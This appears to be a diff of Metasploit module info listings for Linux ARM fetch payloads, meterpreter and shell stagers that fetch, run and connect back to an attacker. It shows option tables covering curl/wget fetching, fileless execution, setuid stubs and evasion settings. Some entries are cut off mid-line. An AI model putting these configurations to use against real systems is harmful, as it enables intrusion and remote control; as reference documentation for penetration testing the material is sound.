Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,96 +0,0 @@
Name: HTTP Fetch, Bind TCP Stager
Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
nemo <nemo@felinemenace.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,102 +0,0 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Nor
Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp:
=========================
nemo <nemo@felinemenace.org>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http:
=========================
cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME eOJorghpY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,85 +0,0 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager
Module: payload/cmd/linux/http/armle/shell/bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
nemo <nemo@felinemenace.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME DNCjskbcX no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
dup2 socket in r12, then execve.
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,93 +0,0 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/armle/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
nemo <nemo@felinemenace.org>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME GqKkLiLQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
dup2 socket in r12, then execve.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
